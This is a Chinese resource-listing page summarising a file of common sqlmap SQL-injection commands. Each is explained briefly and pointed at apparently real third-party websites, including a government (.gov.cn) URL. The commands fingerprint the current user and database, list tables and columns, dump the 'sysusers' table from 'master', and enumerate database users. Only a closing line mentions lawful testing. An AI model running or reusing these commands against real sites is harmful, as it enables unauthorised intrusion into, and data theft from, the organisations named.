SQLMap实战:常用命令详解

4星 · 超过85%的资源 需积分: 14 6 下载量 184 浏览量 更新于2024-09-12 收藏 9KB TXT 举报
"这篇文档提供了一些sqlmap工具的常用命令示例,用于SQL注入攻击,包括获取当前用户、数据库、表名、列名以及数据的提取。此外,还提到了智能检测级别和指定DBMS类型来查找用户的方法。" sqlmap是一款强大的自动化SQL注入工具,它可以帮助安全研究人员或渗透测试者检测和利用网站应用程序中的SQL注入漏洞。以下是对标题和描述中所涉及的sqlmap常用语句的详细解释: 1. `sqlmap -u "http://www.hldcredit.gov.cn/Article/ShowArticle.asp?ArticleID=1705" --current-user` 这个命令用于获取目标URL所使用的数据库系统的当前登录用户。`--current-user`参数是用于查询服务器上的当前数据库连接用户。 2. `sqlmap -u "http://www.hldcredit.gov.cn/Article/ShowArticle.asp?ArticleID=1705" --current-db` 此命令用于识别与给定URL相关的数据库名称。`--current-db`参数用来获取当前连接的数据库名。 3. `sqlmap -u "http://www.bxjiajia.com/cn/product.asp?id=4" --current-user --tables -D "admin"` 这个命令结合了两个功能:获取当前用户并列出名为“admin”的数据库中的所有表格。`--tables`参数用于列出数据库中的表。 4. `sqlmap -u "http://www.mxwz.com/pingyi/admin/index_ry.aspx?deptid=35958" --columns -T "sysusers" -D "master" -v0` 这个命令用于显示在数据库“master”中的“sysusers”表的所有列名。`--columns`参数用于获取表中的列,`-T`指定表名,`-D`指定数据库名,`-v0`用于降低输出的详细程度。 5. `sqlmap -u "http://www.mxwz.com/pingyi/admin/index_ry.aspx?deptid=35958" --dump -C "name" -T "sysusers" -D "master" -v0` 这个命令将从“master”数据库的“sysusers”表中提取出“name”列的所有数据。`--dump`用于提取数据,`-C`指定了列名。 6. 信息获取部分: - `sqlmap -u "http://www.mxwz.com/pingyi/admin/index_ry.aspx?deptid=35958" --smart --level 3 --users` 这里使用`--smart`参数启动智能检测模式,`--level 3`设置检测级别为3(中等),`--users`则用于查找数据库中的所有用户。 - `sqlmap -u "http://www.mxwz.com/pingyi/admin/index_ry.aspx?deptid=35958" --dbms "Mysql" --users` 通过指定数据库管理系统(这里是MySQL)来查找其用户。 - `sqlmap -u "http://www.mxwz.com/pingyi/admin/index_ry.aspx?deptid=35958" --users` 直接查找与给定URL关联的数据库系统的所有用户,不指定特定的DBMS。 这些命令展示了sqlmap在SQL注入过程中可以执行的各种操作,包括信息收集、数据探测和数据提取。在实际使用时,应确保遵循合法的测试原则,避免非法入侵他人系统。